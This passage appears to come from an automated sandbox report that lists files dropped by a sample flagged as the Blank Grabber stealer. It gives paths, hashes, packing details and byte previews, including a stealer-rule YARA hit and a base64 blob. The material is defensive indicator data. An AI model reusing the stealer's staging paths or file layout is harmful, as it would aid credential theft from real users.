Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23536
Entropy (8bit):	7.33649667835335
Encrypted:	false
SSDEEP:	384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
MD5:	3CDFDB7D3ADF9589910C3DFBE55065C9
SHA1:	860EF30A8BC5F28AE9C81706A667F542D527D822
SHA-256:	92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
SHA-512:	1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fa!.".O.".O.".O.+x.. .O.puN. .O.puJ.).O.puK.*.O.puL.&.O..uN. .O.".N.b.O..rN.'.O..uB.#.O..uO.#.O..u..#.O..uM.#.O.Rich".O.................PE..d....(.b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	627184
Entropy (8bit):	7.993580071159261
Encrypted:	true
SSDEEP:	12288:RGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBWpE:RsKl/Ew166OtHxaDJJwZATkrcB9JcgWa
MD5:	59ED17799F42CC17D63A20341B93B6F6
SHA1:	5F8B7D6202B597E72F8B49F4C33135E35AC76CD1
SHA-256:	852B38BD2D05DD9F000E540D3F5E4962E64597EB864A68AA8BB28CE7008E91F1
SHA-512:	3424AD59FD71C68E0AF716B7B94C4224B2ABFB11B7613F2E565F5D82F630E89C2798E732376A3A0E1266D8D58730B2F76C4E23EFE03C47A48CBF5F0FC165D333
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.C..@C..@C..@J.@O..@...AA..@...AO..@...AK..@...AG..@...A@..@C..@..@...AB..@...AB..@...@B..@...AB..@RichC..@................PE..d....(.b.........." .....@...0......P.....................................................`..............................................!..........................................................................`...8...........................................UPX0....................................UPX1.....@.......<..................@....rsrc....0...........@..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	293360
Entropy (8bit):	7.986777578304979
Encrypted:	false
SSDEEP:	6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
MD5:	2218B2730B625B1AEEE6A67095C101A4
SHA1:	AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
SHA-256:	5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
SHA-512:	77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.OJ).OJ).OJ).7.).OJ).:K(.OJ).:O(.OJ).:N(.OJ).:I(.OJ)i:K(.OJ){=K(.OJ).OK).OJ)i:G(.OJ)i:J(.OJ)i:.).OJ)i:H(.OJ)Rich.OJ)........PE..d....(.b.........." .....P...........U... ................................................`..........................................{..X....y.......p.......................{.......................................a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24nycrrv.fel.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axfsuimp.50u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnaanyf5.0kh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx0eaaae.pxq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3xq0hkp.e02.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiskxn0l.3zl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq3gpcc0.exd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1z1j1sc.jnf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn4pidah.ddi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0yj3dev.yfn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npdcrfxe.rnq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvh034xy.m2u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfhxv4mc.2dp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swd1ywnv.tqx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttigbrpb.4vf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ualiogfg.k0h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqukvufn.bor.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wv4iljet.yqa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgleusez.dsx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zunhxzc5.e4t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aIA4J94xdK

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bba2018c39ea80e6507645609af5208d547f6a81

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	276
Entropy (8bit):	5.757561946968967
Encrypted:	false
SSDEEP:	6:dMYlJFlp/Xc7Si0rv2a0MV8UBD7dj9Uh2URL8v8MMd8DXOChV:mQ7/MjVMV8UBDpj9i18vE8DeChV
MD5:	0E95F784E5579A37D6A60228D9014518
SHA1:	0EF30761B0576BB492375D74B87A978EE598EA14
SHA-256:	73B981A0226A38B790A9FCBB3525B0BEA67E867A9E0F24D972B8C6C843107C27
SHA-512:	3180188CC0C5AFEBA5D22159AFF5D5A6916D162005D488B80372AB5F24127B66A5C53C2D1EAA6E514458E46EB9FE2231E10C7E29D0F6B058E92A9719EDFB10C4
Malicious:	false
Preview:	H4sIAAAAAAAEAIWQwW7CQAxEfyXi3PYDuIUgxIFD2oAqFfew3UyTrbLrlb0N0K/vglAVIaEe7fG8sb2fVXOiF1geISeidXyu6zfzY8cnHDF7uJEjHyDaYxgmci3cifHFyg1QolcXWj5oscQnQgshQnjcNUQfRtH+72tgv8WlnLaQXEMqFvxBrIrqBHJ1nWk5L9n+zg27DMpTXxzOWWWMS5MM0YatGYi28JHIa9khpMaMUM/BJc7LV71xoWLfQPIPru0L+P0X+HVKJD0BAAA=

C:\Users\user\AppData\Local\Temp\doXtfh2drX

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0719628156120726
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfak7YnqqbPN5Dlq5J:+RI+ycuZhNdakSbPNnqX
MD5:	5E6327733D9CC8A84656D5805413E62E
SHA1:	49F34E944CDB869B5059DB2AE28B7D7FEBF1214C
SHA-256:	63CF0905521D53F6A246492CC7AF96BB4B1D7EF070991177CA1CA1489607C22D
SHA-512:	7DA717FF1F7FE95A1D0BF4C5048FEBD5B84446FED00B204A846C5BA35AE0C3B7C9D1CCDC154772C37CF9646F772FFBF2967805DCBAD4584F035F83E14CF4243F
Malicious:	false
